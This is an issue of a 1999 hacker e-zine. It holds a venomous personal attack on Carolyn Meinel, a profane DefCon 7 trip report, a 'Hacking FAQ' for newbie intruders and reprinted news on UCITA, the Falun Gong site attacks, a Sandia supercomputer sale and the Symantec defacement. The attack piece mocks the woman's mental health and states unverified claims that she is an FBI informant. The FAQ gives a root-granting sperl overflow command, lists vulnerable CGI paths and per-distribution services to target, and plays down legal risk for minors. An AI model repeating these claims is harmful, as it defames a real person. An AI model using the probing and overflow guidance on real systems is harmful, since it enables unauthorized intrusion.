Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
03.0 Debunking the debunked by route
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From www.antionline.com
Debunking The Debunked
Wednesday, July 28, 1999 at 23:57:30
by Mike D. Schiffman - Reprinted With Permission
In a 16-foot wide 9-year old trailer park home in New Mexico, a
52-year old delusional woman sits in front of a computer toiling away
on a non-technical "hacking" document fraught with errors.
You might remember Carolyn P Meinel as 'The Happy Hacker' from
such E-Files as "A Weekend Without My Zoloft" and the underground
classic "Has Anyone Seen My Dignity?"
Although some people would like to classify Carolyn as 'merely'
delusional or talent-less, our research has added 'washed-up crackpot'
and 'media charlatan.' Often we wonder how Carolyn has achieved so
little over so much time, and with this brief interlude, we peel back the
layers of the onion with an exclusive report from DefCon7.
As it happened during the weekend of July 9th in Las Vegas, NV at
the seventh installment of the DefCon Security Convention, it appears
that Carolyn forgot her medicine. And these aren't simple antibiotics or
histamine blockers (although she could probably use those too). No
dear friends, these are powerful psycho-reactive mind-altering
chemicals such as sertaline hydrochloride and diazepam. This woman
has serious mental problems that require medication and treatment.
We caught up with Carolyn in the hotel bar at the Alexis Park, this
interviewer was participating in some lighthearted revelry with friends
and cohorts, enjoying the ebb and flow of the convention we've come
to know and love... Late into the night we had a great time recounting
times past.
As the night progressed, we moved the group out of the bar into the
hotel foyer where our merriment was abruptly halted. The foul stench
of insanity lingered in that part of the hotel, and it was instantly known
to all that Carolyn was upon us.
Initially, I found myself finding a good deal of humor with her attire, I
pondered the drifter's corpse that she absconded her dress from, and
focused on my mission at hand. The question on everyone's lips:
"Is Virginia here this year?"
However, before I could gather my senses, a whirlwind of stupidity
was unleashed as Carolyn's disease attempted to spread to another
mind. With her gaping maw open, she turned the boring-machine up to
11 and hosed down an unsuspecting convention-goer.
With all that had happened, I was stunned. This was the heaviest blow
of all. I could find no other recourse but to confront her on one of the
numerous topics that burn in the scene. It was, at that time still unclear
to me why she had misinformed the FBI that I was involved in HFG,
and I decided to question her on that, in the hopes of two results.
Intended result #1 was to shut her the fuck up for a minute. Intended
result #2 was to get an explanation, apology, or at best a
rationalization. However, as she turned to me with the vapid stare of
ignorance, I knew no one could win this battle. No good would come
from this conversation, and Carolyn made sure of that.
Initially, Carolyn feigned stupidity (which was eerily convincing, but
even the best lies are peppered with truth) and claimed she didn't
know me. Having dealt with this woman numerous times (including a
few *shudder* face-to-face meetings) and given she tried to implicate
me within the ranks of HFG, the ruse lacked even humor, as the
attempt was so weak.
After a few hot comments were traded, Carolyn's attempt at throwing
down the gauntlet was to challenge myself and my cohorts to 'hack'
into her modified Linux box. Now, perhaps Carolyn misunderstands
the way the new generation of hacker-types operate. First of all, we
don't get out of bed for less than a hundred dollars. And we certainly
don't waste our time breaking into a machine that serves no real
purpose. Why Carolyn used her box in the capture the flag
competition as a challenge is beyond us, as her personal website has
been hacked more times than are worth counting. And honestly, at this
point, who hasn't received a DCC offer of her mailbox or home
directory tarred up? If that is not evidence of her inability to truly
secure a box, then I don't know what is. Granted, she wished to rest
on her insignificant laurels, and a subtle crack about using finger to
break into her box was sufficient to diffuse that portion of the
conversation.
With her last karate-inept leg kicked out from underneath her, Carolyn
attempted to leave with a modicum of respectability, which sadly
slipped from her grasp due to her own failings and incompetence...
The Granny Hacker from Heck? Hardly (except the older-than-dirt
part). The Clown Princess? I suppose this is half true. Clowns are an
amusing sort, accustomed to being ridiculed. But I think she missed the
princess bit by about 30 years. The Happy Hacker? She didn't seem
very happy to us. Especially with the 3 part Antionline article, that
starts off attempting to be slightly informational, but ends up being a
diatribe of self-promotion and bitter remarks about convention goers.
No Carolyn, you're not part of "the club". We're sorry, but you're too
crazy, too medicated, too old, and too stupid.
Also, Carolyn, you had more than a week between the end of DefCon
and the posting of the Antionline article. The best insult you could
come up with was to say I `pumped my muscles up with a bike
pump`? I mean, what sort of 1940's street-tough book of insults are
you consulting? Double dumbass on you Carolyn.
Contrary to what she swears up and down, Carolyn Meinel is indeed a
confidential informant for the Federal Bureau of Investigation, and her
status is listed as "MI" and "PS". MI indicates that the informant suffers
from a mental or emotional dysfunction, and all information must be
scrutinized as such. PS means that she is a probable suspect. This is
why the FBI polygraphed her. Do you trust her?
Now, don't get us wrong. We actually like Carolyn Meinel. As Virii
makers have a symbiotic relationship with companies that make
Anti-Virii software, true hackers and their ilk have a symbiotic
relationship with the uninformed vocal nay-sayers that try to misinform
the public as to our actions. Without Carolyn, no one would know
how great we really are. It is impossible to fully appreciate what
`good` is when you have no frame of reference in understanding what
`bad` is. For this, we can only thank you Carolyn. Your efforts and
misinformation only further our roles as highly paid debunkers of your
insanity. When you're 65 and retired, or possibly deceased -- we'll just
be entering the prime of our lives and professional careers. If you're
still around then and your descent into lunacy hasn't pushed you over
the brink, look us up. We love clowns.
And, by the way Carolyn, do send Virginia my love.
@HWA
04.0 DefCon 7 by Agent X
~~~~~~~~~~~~~~~~~~~
(Thanks to Agent X for permission to reprint this - Ed)
Defcon 7
by
Agent X
Prelude
Defcon baby, yeah that's the ticket, hackers, computer security consultants, feds, kooks, surveillance geeks, and a whole slew of other weird ass spooky mother
fuckers, get drunk, go to titty bars, talk about crypto and network security, fucking with the media, blowing shit up in the desert and generally have a great fucking
time in the city of sin all under the guise of a computer security convention. And if they are lucky or sneaky paid for by their respective bosses. I am neither lucky or
sneaky so I'm paying for this out of my own pocket, which by the way sucks. But I'm ready the tickets are bought the gear is packed. I have fortified myself for this
trip, with a bowl of corn flakes, a cache of CDs, and a hangover. I dry swallow two Alleve as I step out the door.
The 3 hour bus ride to the airport was about as exciting as a 3 hour a bus ride can be. In other words deathly boring. But the headache is gone. I'm at the airport
lounge, drinking a L.I.T and trying to figure out if 7 buck is to much to pay for a burger. Airports are about the most boring places to be stranded for any length of
time as well. The televisions only show 2 things, golf or 5 minute news reels. The food is generic and expensive. And there is no fucking place to check my e-mail.
Only another 4 hours till my plane leaves. The Plane: It's a sign when 12 mothers carrying screaming babies get on the flight. We hit the worst turbulence I have ever
seen or felt. [the guy beside just used his barf bag for it's intend purpose]. I can see it now the wings snap off and barrrroooooooom! I'm just another flight statistic.
Wouldn't that just be the rats asshole to die on the way to Detroit.
[Note at this point this article goes into short hand mode, there was just to much happening to quickly for me to mention, remember or talk about]
Friday
From this point on things be come an insane blur of meeting new people and getting things done. I arrive 3 hours late to the hotel, the people I'm staying with had a
hell of a time checking in and I'm exhausted , I have a glass of water and go to bed. Friday First day of con I get up, get dressed and eat some breakfast all by 7:00.
To do my part by gooning at the con. Big mistake It's a mad rush after that, from getting a goon badge to working on pre-registration. The List for registration is
great except that it's not in any order. So I GREP the whole list a couple of hundred times during the con. I check people in all day long. By the end of the day I
know almost everyone at con who is on the list. Naked people count for Friday: 1 guy gets up on a table and strips down to his G-string, 2 naked fat guys jog
around the vendor area for free t-shirts 1 babe hops up and a table and gives everybody a show of her tits. I love Vegas. The day is hectic and long. I'm exhaust by
the time I sit down at 7:17 to write this before heading out to the MGM grand for some dinner. Vegas is a weird as ass place. New York New York the most
disturbing of all. The fake graffiti, the fake manhole cover with fake steam, all in fake NYC it is not right I was just waiting for a fake mugging in a fake dark and dirty
alley. After getting back to the hotel I collapsed on the bed.
Saturday
Slept a hard 8 hours last night, got up and help register people, mad craziness more people then you could possibly images. All of them young white males. Checked
out the DJ action, saw my ghetto hacker buddies TDA and Jester 47 spin some mad tunes to Ninja Scroll video. The CDC show rocked ass. Total mayhem, with a
revival theme, it doesn't get much better then this. Things slowed down a bit. Checked press badge for the After CDC presentation in the media suite. Went up and
talked with some media types. Got to see what the media is like in action. I expected to hear some really probing question that were well researched and insightful.
They weren't, nuff said. Finally got to chill about 7 or 8 helped set up for the root suite party. Went back to my room changed and got booze, went back to the root
suite and proceed to drop a complete bottle of tequila on the floor. Saturday night Mad partying in the root suite Saturday night. I played bartender for most of the
night, pouring DoC beers, serving punch and mixing drinks. Dis Org Crew beer was great. The Strawberry SYN Flood was smooth and sweet, the Brown Box
Barley Wine was strong as hell, and the FireWire Stout which is fortified with caffeine is the perfect hacker beer. Congrats to HCF, Wyatt Earp, Pete Shipley and
the rest of the DoC who helped for a great beer. Caezar defiantly knows how to throw a party. Towards the end of the night I was getting help from Jennifer
Grannick. Left about 4 or 5 went back to the room and slept like the dead. Slept for 2 hours and got back up. I had a English muffin for breakfast it was good.
Sunday
By Sunday the kinks had been somewhat worked out and things were finally running reasonable smoothly, I helped with this and that. Sold shirt and mugs for the
better part of the morning, some guy wanted to trade a rental car for a t-shirt, I told him to get permission from Priest. He ended up trading us some porno passes
for a shirt instead. Finally had lunch with some cool people's one of which was with the NSA. After lunch I'm up in the media/goon lounge resting and eating some
fruit with Major Malfunction when his radio goes off, "all goons to the NOC" and then "Carolyn is being kicked out" Needless to say Carolyn got kicked out of con..
I'm sure that she will write all about it on her web site. I'm sure she will paint herself as the victim, either way I don't care, she is an adult and she should have known
better. After word I wandered around some more. Said good-bye to all the people I could find. Went back to the hotel grabbed my bag want got on a plane fell
asleep. Switch planes fell asleep. got off plane got on bus fell asleep, switch busses fell asleep. Got off bus got home fell asleep. ....till next year.
Quotes from the weekend:
A short conversation I had with some newbie kid who wandered into the root party.
" So your in l0pht"
" oh yeah me and the rest of the east coast people"
"really"
"My son did his first hack at age 7, I was so proud." Major Malfunction.
Who Agent X is a slacker. The views, commentary and ideas expressed in this article are not those of Hacker News Network, it's Editors or the Defcon Organizers.
I own my own words.
Agent_X@flashmail.com
Links referenced in the original HTML version of this article:
http://www.defcon.org
http://www.cultdeadcow.com/
http://www.dis.org/doc.html
http://www.dis.org/warz/beer.html
http://www.caezarschallenge.org/
@HWA
05.0 Hacking Faq by ben-z 5/14/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
There are a number of "hacking faqs" around the net most of which date back at the very least to 1996
this is one of the few 'new' ones i've come across, so i've decided to share it here for your reading
pleasure, its aimed at the 'newbie hacker' and is written by a well known underground denizen, ben-z
- Ed
Found at http://come.to/sota
[**] FAQ: Hacking @ 5/14/99 by ben-z [**]
NOTE: if date > */2000, dont bother reading this.
http://www.slacknet.org | benz@slacknet.org
A. Section [I] -- Beginners
(index)
01. How do i tell if a system is running UNIX?
02. How do i determine which flavor of UNIX a system runs?
03. What exactly happens when i "hack" UNIX?
04. Do I need an account on a system to hack it?
05. What is DoS?
06. How do I protect myself from DoS attacks?
07. What is a buffer overflow?
08. What are some good web/ftp sites for UNIX?
09. What is BSD?
10. What is Linux?
11. What does x86 have to do with anything?
12. What else is there besides x86 systems?
13. What are some commonly open services to look for?
14. What is the easiest way to hack a system right now?
15. Can i hack anything from windows?
16. Why is Linux a better OS than windows?
17. What is suid/sgid?
18. Where is the best source of info for newbies?
19. How much trouble can I get in for hacking?
20. What kind of system should I try hacking first?
(Q/A)
01. How do i tell if a system is running UNIX?
A: There are several ways to determine the operating system of a remote
system. The first and foremost way to determine if a system is running
UNIX is to both telnet and ftp to it, then check the login message. For
telnet, if you get anything like BSD, UNIX, Linux, AIX, IRIX, or HPUX
then it is most likely a unix system. However, it is possible to change
the message displayed (/etc/issue.net) when a telnetd connection is
established, so telnet banner grabbing is not always the most reliable.
Via ftp, you can usually make a fairly accurate guess at the OS by looking
at the ftpd version. If you see something like wu, ncfptd, or proftpd, then
it is a UNIX system. Most large ftp archives run UNIX, but just in case,
look for a message containing "Microsoft" or "Serv-U", which do not run on
anything but ms windows (bad!).
Another more accurate way of determining the OS is to examine the packets
via predetermined OS fingerprints. There are several packages out now
which do this, the best of them being nmap by fyodor
(http://www.insecure.org/nmap), and queso by els apostols. These simply
scan the open ports on a system and attempt to find a match for the packet
types. Nmap currently includes hundreds of OS fingerprints, and is known
for its accuracy and speed. OS fingerprinting is not one-hundred percent
accurate either; the details of this are too complex for this paper.
Basically, some system administrators change the look of the outgoing
packets to fool your scanner into thinking it is something else, or give it
no reading whatsoever. the details are available at
http://www.geek-girl.com/bugtraq.
02. How do i determine which flavor of UNIX a system runs?
A: (see telnet banner grabbing description above) -- telnet banners
often reveal which OS and version the system is running. If you have
local access to the machine (an account), then you can type uname -a to
see some system information. On Linux, you can cd to /proc and cat cpuinfo
for other interesting stats. If the system is running RedHat Linux, then
a file exists in /etc called redhat-release which contains the release and
version of the system.
I am also working on a package to determine the distrobution of a system
via comparing rpm's to known fingerprints (similar to nmap), thus making
it easier to find an exploit which will work on the system.
03. What exactly happens when i "hack" UNIX?
A: To know whether or not you have successfully "hacked" a UNIX system,
there are a few commands you need to be familiar with:
_______________________________________________________________________________
| command | description |
|-----------------------------------------------------------------------------|
| id | prints your current UID/GID. 0 = root = success! |
| whoami | determines which user you are logged in as. |
| set | shows a list of some system variables including $USER and $EUID. |
-------------------------------------------------------------------------------
If you don't know what root is, then you need to do some background UNIX
research before reading this again. Otherwise, here are a few other tricks
to see if you are really root.
a. bash prompt: When logged in as a normal user, you usually have a prompt
similar to bash$. As root, your prompt defaults to bash#.
b. system variables: typing echo "$USER / $EUID" *should* effectively tell
you which user the system thinks you are.
c. file access: As root, you should have access to read/write most files.
Try logging in as a normal user and reading /etc/shadow
or /etc/passwd. Most systems do not allow normal users to
read these files for security reasons however, if you are
root, you may read/write them as you wish.
04. Do I need an account on a system to hack it?
A: No. Many systems can be compromised remotely via overflows in vulnerable
services running. This is the main difference between hacking UNIX and NT:
UNIX was designed with remote administration in mind, thus making it easier
to manipulate once access is obtained. With NT, no telnet daemon is
present, and playing around usually requires your presence at the actual
system itself. Of course anyone with 1/2 of a brain can secure their system
from remote attacks, so a local account is a definate bonus.
05. What is DoS?
A: No kiddies, this isnt C:\DOS. This is Denial of Service, a very deadly
(and lame) concept. As there are very few useful purposes for DoS, it is
mostly used to show power and skill, even though it requires almost no
skill whatsoever. The only useful reason i can think of to DoS a system is
for spoofing purposes: when a system is taken off of a LAN, you can change
your address to the one you knocked off, and intercept vital information
and user passwords. This is explained in detail at http://www.rootshell.com
(under documentation) look for whitepapers on tcp hijacking. Ok, back to
my explanation of DoS. Denial of Service by definition is simply denying
service to any machine on a network, thus causing problems and/or crashing
the system. The most popular DoS attacks out right now (to my limited
knowledge) are papasmurf, boink/poink, feh, smack, bmb, and synk5. These
are commonly used toys on irc, so watch your back.
06. How do I protect myself from DoS attacks?
A: There is no one-hundred percent reliable method for stopping DoS
attacks. If the attackers bandwidth is much greater than yours, then you
lose: end of story. However, if the attacker has equal or lesser resources
than you, they are easily filtered out by software such as ipfwadm for
linux 2.0.x, ipchains for linux 2.2.x, and conseal pc firewall for windows.
Some interesting firewall/filtering scripts can be found at
http://www.freshmeat.net and http://www.linuxberg.com. If you like to
chat on irc (yay!), then it is wise to use a bnc (bounce) to hide your real
address and virtually irc off of a faster connection. bnc source is
available for download at ftp.bitchx.org/pub/misc.
07. What is a buffer overflow?
A: In short, a buffer overflow is the pushing of data onto a stack, thus
executing carefully constructed code as the user the program is running as.
Example:
[benz@oldbox]$ whoami
benz
[benz@oldbox]$ /usr/bin/sperl4.036 AAAAAA(etc..) [garbage]/bin/sh
Segmentation Fault
[root@oldbox]# whoami
root
The above log is an example of the classic sperl overflow which drops root
access. To make sure the program you are trying to overflow will give you
root, you need to type ls -al file and look for "s" in the permissions
somewhere, and that it is owned by root. This indicates that the program
is suid/root and when run will actually switch to user root and execute.
This explanation is a very short and simple version of a complex topic,
which can be studied in more detail at http://www.phrack.com - issue 49-14:
"Smashing the Stack for Fun and Profit" by Aleph One.
08. What are some good web/ftp sites for UNIX?
A:
Bugtraq security mailing list: http://www.geek-girl.com/bugtraq
rootshell archives (out of date): http://www.rootshell.com
technotronic archives: ftp://ftp.technotronic.com
SlackNet: http://www.slacknet.org
Linux.org: http://www.linux.org
FreeBSD.org: http://www.freebsd.org
Packetstorm: http://packetstorm.genocide2600.com
2600 magazine: http://www.2600.com
Phrack magazine: http://www.phrack.com
09. What is BSD?
A: BSD, short for Berkeley Systems Distrobution, is a UNIX flavor known for
its stability and ease of use. More information can be found at
http://www.freebsd.org, http://www.openbsd.org, www.bsdi.org, etc.
10. What is Linux?
A: Linux, originally developed my Linus Torvalds, is a POSIX based OS
commonly used by everyone from hackers to goat feeders. more information
can be found at http://www.linux.org.
11. What does x86 have to do with anything?
A: x86 is the standard abbreviation for an intel processor based
system. the x has nothing to do with the processor, it is simply a
wildcard definition for all *86 systems. Example: i386, 586 (pentium).
12. What else is there besides x86 systems?
A: Besides Intel based systems, their are many other architectures
used with UNIX. Probably the most common non-x86 architecture is a
sparc. Although capable of handling almost anything, these typically
run either SunOS or Solaris.
13. What are some commonly open services to look for?
A: The services i generally look for the most are very dependant on
what OS the target is running. For example, if the target system is
Linux 2.0.3x, I typically scan for rpcbind/portmap on tcp/111 because of
the well known mountd overflow. Below is a brief list of what I check for
specifically on several operating systems.
Redhat 4.2: tcp/143 (imap), etc..
RedHat 5.0: tcp/25 (sendmail), tcp/143 (imap), tcp/25 (qpop), tcp/53 (bind)
RedHat 5.1: tcp/111 (rpcinfo -p <target>), tcp/110 (qpop), tcp/53 (bind)
RedHat 5.2: tcp/21 (wu-2.4.2-academ[BETA-18](1))
Slackware: tcp/111 (rpc), tcp/110 (qpop), tcp/21 (wu-ftpd), tcp/53 (bind)
FreeBSD: tcp/110 (qpop), tcp/143 (imap), tcp/53 (bind)
Solaris: tcp/110 (rpc), tcp/53 (bind)
14. What is the easiest way to hack a system right now?
A: <see #13 for service list>
15. Can i hack anything from windows?
A: Suprisingly, yes. There are about 50 different ways you can hack
with just a web browser. These are known as cgi exploits; below is a list
of several which i typically check for:
/cgi-bin/phf
/cgi-bin/php.cgi
/cgi-bin/Count.cgi
/cgi-bin/info2www
/_vti_pvt/service.pwd
/cgi-bin/test-cgi
/cfdocs/expeval/openfile.cfm
/cgi-dos/args.bat
/cgi-win/uploader.exe
16. Why is Linux a better OS than windows?
A: There are hundreds of reasons why Linux owns windows, but instead
of explaining all of them, I'll just give you some advice: take my
word for it. If you happen to be one of those people that needs facts
to survive, check out http://www.darkelf.net/metachart.
17. What is suid/sgid?
A: <see #07>
18. Where is the best source of info for newbies?
A: My best reccomendation would definatly have to be irc. Since most
hackers tend to learn things on their own, hacking resources are not as
plentiful as they probably should be, but there are still excellent sources
available. See the URL section above for more information.
19. How much trouble can I get in for hacking?
A: The typical student hacker (such as me) is still under the age of
18, rendering him a minor. If adult charges cannot be filed, then don't
worry about much other than a harsh bitching and possibly a small fine.
For those of you that no longer have the age advantage, I reccomend
consulting a lawyer before getting seriously into hacking. This may sound
a bit extreme, but anyone who gets good enough to be noticed needs a
lawyer eventually anyway. For some information on what can happen as
an adult, just take a look at http://www.kevinmitnick.com.
20. What kind of system should I try hacking first?
A: For beginners, the first computer I reccomend trying to root is
your own. Their is no better way of security and learning than a local
machine that you actually own and operate. Try experimenting with
several UNIX flavors such as Linux and BSD, then it's up to you from there.
[**] dont worry.. part [II] Intermediate instruction is coming! [**]
@HWA
06.0 Group approves controversial software law
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by D----Y
http://www.infoworld.com/cgi-bin/displayStory.pl?990729.ecucita.htm
Group approves controversial software law
By Jack McCarthy, Nancy Weil, and Jessica Davis
InfoWorld Electric
Posted at 5:00 PM PT, Jul 30, 1999
In a blow to both big corporate software consumers and those who buy their software in retail stores, a group that works to unify state laws this
week passed the Uniform Computer Information Transactions Act (UCITA) legislation, which is widely opposed by software consumer advocates, software
developers, and IT organizations.
The legislation will theoretically allow software vendors to repossess software by disabling it remotely, and to disclaim warranties. It will also prevent the
transfer of software licenses from one party to another without vendor permission, and will outlaw reverse engineering.
UCITA's opponents said that its development was heavily influenced by software manufacturers, and that it favors them in software contracts and disputes
concerning software licensing.
"What purpose is it going to serve other than litigation and additional cost to users?" said Michael Scott, a senior engineer at the California Department of
Transportation, in Sacramento, Calif. "It sounds like a great coup for the software industry, but doesn't sound very advantageous for users."
Members of the National Conference of Commissioners on Uniform State Laws (NCCUSL) voted on UCITA and several other revisions to the commercial
code at their annual meeting in Denver.
In a state-by-state vote, 43 states approved UCITA, six opposed it, two abstained, and two were not present at the voting. The proposal now goes to various
state legislatures for approval. Most or all states typically approve the laws recommended by the NCCUSL. IT opposition to the legislation, including a
letter-writing campaign to members of the NCCUSL, failed to sway the commissioners.
The dry, complex language of the 123-page legislation may also have contributed to a lack of understanding on the part of many software users.
Proponents of the legislation have said that UCITA is a necessary step in defining the law regarding software and computer information sales, which were not
contemplated when the Uniform Commercial Code (UCC) for the sale of goods was written.
The act means both vendors and users will be able to count on a uniform law, instead of relying on differing laws on a state-by-state basis, according to Ray
Nimmer, a law professor at the University of Houston Law Center and the law's primary author.
"We think that this will extend the rights of end-users," Nimmer said.
Nimmer said that the opposition to the law during the last year and a half has been punctuated by hyperbole, and now it is critical that the debate shift over to
reality.
Opponents to the legislation include technology consumer groups, various trade associations, and some law professors, who contend that UCITA will result in
increased costs for companies, while giving software vendors undue power.
"This law is going to be bad for the industry and for the country," said Cem Kaner, a software developer, attorney, and author who has taken a lead in fighting
the proposal. "It redefines intellectual property law in a way that transfers huge amounts of power from the public, including universities, libraries, and [software]
customers, to software publishers." In the days before the final UCITA vote, several state attorneys wrote letters to the president of NCCUSL, urging the group
to reject the law. An estimated 25 to 28 attorney generals have gone on the record in opposition, including those from Connecticut, Idaho, Indiana, Iowa, Kansas,
Oklahoma, Pennsylvania, and Washington state.
The National Conference of Commissioners on Uniform State Laws, in Chicago, is at www.nccusl.org.
Jack McCarthyis a San Francisco correspondent for the IDG News Service, an InfoWorld affiliate. Nancy Weil is a Boston correspondent for the
IDG News Service, an InfoWorld affiliate. Jessica Davis is an InfoWorld associate news editor.
@HWA
07.0 Falun Gong Web Sites Attacked by China?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by tacscan
Web sites of the group Falun Gong a meditation group is
claiming that the web sites of its supporters are being
target and attacked by China. Initial evidence seems to
point to the Public Security Ministry's Internet
Monitoring Bureau as the agnecy responsible for various
attacks. Falun Gong, outlawed in China, is a group that
draws on martial arts, Buddhism and Taoism and is
devoted to physical and mental fitness, high moral
standards, and denies that it is either a religion or a
political movement.
Boston Globe
http://www.boston.com/dailynews/211/nation/Chinese_officials_try_to_hack_:.shtml
Chinese officials try to hack U.S. Web sites, meditation
group members say
By Peter Svensson, Associated Press, 07/30/99 16:17
NEW YORK (AP) Web sites in the United States and elsewhere devoted to the Falun Gong
meditation group are coming under heavy electronic attack, managers of the sites said Friday, and
at least one ''hacking'' attempt appears to trace back to a Chinese national police bureau in Beijing.
Falun Gong has been banned in China, where communist authorities are engaged in an escalating
crackdown, arresting adherents and confiscating publications and videos.
Bob McWee, of Middletown, Md., a Falun Gong practitioner, said a site he maintains to promote
the group, www.falunusa.net, has been under persistent electronic assault.
In a telephone interview, McWee said his Web server was undergoing a continuous
''denial-of-service'' attack, a common Internet tactic used to overwhelm a computer with repeated
electronic requests like a telephone ringing nonstop to block other callers.
In addition, someone tried to gain access to the server, pretending to be a legitimate webmaster,
and in the process left an Internet address, he said.
''They tried to hack my machine from theirs. And they can't do that without revealing their'' Internet
address, he said.
The address McWee said was left behind is registered with the Asia Pacific Network Information
Centre, a public registry service for Internet addressees. According to the service, there are two
phone numbers in Beijing listed with that address.
When The Associated Press called the numbers, a person who answered the phone identified them
as belonging to the Public Security Ministry. A telephone operator at the ministry said they
belonged to its Internet Monitoring Bureau.
Ministry officials and spokesmen refused to comment Friday.
McWee registered a complaint about the hacking attempt with the Maryland state police's
computer crimes division.
Police spokesman Pete Piringer said that because the attack did not succeed in getting access to
McWee's server, there did not seem to be a crime committed.
A U.S. government agency saw an indirect sign of the attacks.
A network engineer at the U.S. Department of Transportation contacted McWee when they
noticed his server was contacting one of their computers unasked, according to Everett Dowd,
deputy director of telecommunications of the Information Technology Operation at the department.
McWee said this was because the denial-of-service attack sent requests to his server with forged
return addresses, one of which happened to be the department's server.
Administrators of other Web sites devoted to the movement also said they had been attacked.
Li Shao, in Nottingham, Britain, said the site he maintains was hacked into Monday. What he called
Chinese ''government propaganda'' was placed on some pages, while others were deleted.
Jillian Ye, of Toronto, Canada, who maintains two sites, said that beginning one or two months ago,
her server began going down almost every day. The problems got progressively worse, until she
recognized the symptoms of an attack and moved the sites to a more secure server.
In their barrage of criticism of Falun Gong, Chinese state media have cited the group's Internet
presence as proof that it was well-organized and not just harmless meditation buffs.
A government ban on Falun Gong publications passed after the group was outlawed includes
electronic publications. Nearly all of Falun Gong Web sites in China have been shut down since the
ban was announced.
China's communist leaders banned the Falun Gong movement last week, accusing it of trying to
develop political power. Falun Gong leaders have denied any political ambitions and denied they
organized protests that erupted two weeks ago after authorities reportedly arrested leading
members of the group.
Falun Gong, founded by Li Hongzhi, who now lives in the United States, draws on martial arts,
Buddhism and Taoism. The group says its goals are physical and mental fitness and high moral
standards, and denies that it is either a religion or a political movement.
Associated Press Writer John Leicester in Beijing contributed to this report.
@HWA
08.0 Super Computer Almost Gets Away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Mudge
Sandia National Laboratories sold a surplus nuclear
weapons research computer, an old Intel Paragon XPS,
as "spare parts", without the OS to a Chinese national in
California for $30,000 last October. Quing-Chang Jiang,
a citizen of the Peoples Republic of China, then tried to
buy the parts from Intel needed to make it run again.
After conferring with the DOE, Sandia then paid $88,000
two weeks ago to get it back because of security
worries about the deal. The computer, the fastest in
the world in 1993, while now obsolete by U.S.
standards, could have aided a foreign government in
duplicating the advanced work done by US nuclear
weapons labs. (Super Computers just aren't that hard
to get a hold of these days, even fully functional ones.)
San Jose Mercury News - second story
http://www7.mercurycenter.com/premium/nation/docs/natwashdig24.htm
< link broken/Story missing - Ed >
Posted at 8:57 p.m. PDT Friday, July 23, 1999
U.S. buys back computer sold
to Chinese citizen
Associated Press
WASHINGTON -- The Energy Department's Sandia National
Laboratory last week bought back a supercomputer it had sold as
surplus to Korber Jiang, a Chinese citizen who is the principle of EHI
Group USA and exports American goods to his home country.
Rep. Curt Weldon, R-Pa., called Friday for Energy Secretary Bill
Richardson's resignation, saying that the computer could have been
used ``to design nuclear weapons.''
``He's going around the country saying there are no problems in the
Department of Energy, that everything is under control,'' Weldon said
in a telephone interview. ``If there are no problems, then how can this
happen?''
Neal Singer, a spokesman for Sandia National Laboratories, said that
the New Mexico facility sold the Intel Paragon XPS to Korber's
one-man company for $30,000 in October. After discovering
Korber's nationality, Singer said, the department bought back the
computer for $88,000 last week and stored it under guard at Sandia.
The spokesman said the difference in cost may have been due to
shipping costs incurred by Korber.
``Secretary Richardson has instituted a moratorium on any sales of
surplus material that incorporates export control technology until there
has been a thorough review of what happened,'' said Energy
Department spokeswoman Brooke Anderson.
The transaction was first reported by Insight Magazine.
@HWA
09.0 Symantec's website hacked
~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by D----Y
It was rumoured that the site was not only hacked but also infected with virii,
this article tries to clear up the story, ZDNET - ed
http://www.zdnet.com/filters/printerfriendly/0,6061,2307804-2,00.html
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Symantec: Vandals didn't infect us
By Robert Lemos, ZDNN
August 2, 1999 2:02 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2307804,00.html
Internet vandals broke into the servers of network security and utilities firm Symantec Corp.
Monday morning, defacing the company's Web site.
While the vandals claimed to have infected Symantec's network two months ago with a worm,
quaintly dubbed Bloworm, the company denied Monday that any worm existed on its systems.
"There is no virus infection, no worm infection, and no danger to customers," said Richard Saunders,
a spokesman for the Cupertino, Calif., company.
"They didn't get in beyond posting a mildly offensive, but otherwise impotent, message on our home
page."
The five cyber vandals, who identified themselves only by their handles, claimed otherwise. "0ur
w0rm iz spreading around (Symantec's) netw0rk and infecting (it's) f1lez, since about 2 months ago.
phear," stated the group in a document of typically spelling-impaired hacker-speak. The document
was left behind by the group after it broke into the servers of Symantec at about 5 a.m. PT Monday.
Worms are virus-like programs that infect systems through networks automatically and without the
need for an unknowing user to open a file or run an application.
Symantec (Nasdaq:SYMC) has always been a popular target for Internet vandals looking for a hard
nut to crack. The only difference: This time someone actually got in.
"What this incident does show is that you cannot be complacent towards this kind of threat," said
Saunders. The Symantec spokesman could not detail how the cyber vandals entered the company's
network.
Symantec engineers took down the page within an hour of its posting, but not before the media in
Europe got wind of the defacement. The BBC posted a story early Monday morning.
-=-
BBC;
Anti-virus company hacked
A leading provider of net security and anti-virus software, Symantec,
has had its website hacked for about 12 hours, ending around 1300 BST.
The FBI has been informed and is already beginning an investigation.
Visitors to www.symantec.com early on Monday found a page claiming that a
group of five crackers had infiltrated Symantec's servers with a virus called
bloworm.
The crackers said that their virus, a worm, has been spreading around
Symantec's network, infecting files for two months.
However, Aled Miles, Symantec's Regional Director for UK and Ireland, told BBC News
Online: "I can categorically state that there is no effect on our servers internally
- that is a hoax which adds to the publicity wagon."
He added that: "We have established that there was no risk [of infection] to anyone
visiting our website during that time."
Symantec are the makers of Norton Anti-virus software and their UK website says:
"Symantec is a leader in Internet and content security."
The hacking of their website will be seen as embarrassing but Mr Miles said that any
organisation, even the CIA itself, could fall prey to malicious attacks like these.
He said: "The sad reality is that whilst the Internet is a tremendous new technological
force, it comes with its down side. What matters is how quickly we as a company react to
this type of incident.
"What I am not embarassed about is the speed and agility we have shown in sorting this
out. I don't think it damages our reputation in the slightest."
Symantec has become a higher profile target in recent months due to its work in combatting
viruses such as Melissa, explore.zip and the program Back Orifice.
@HWA
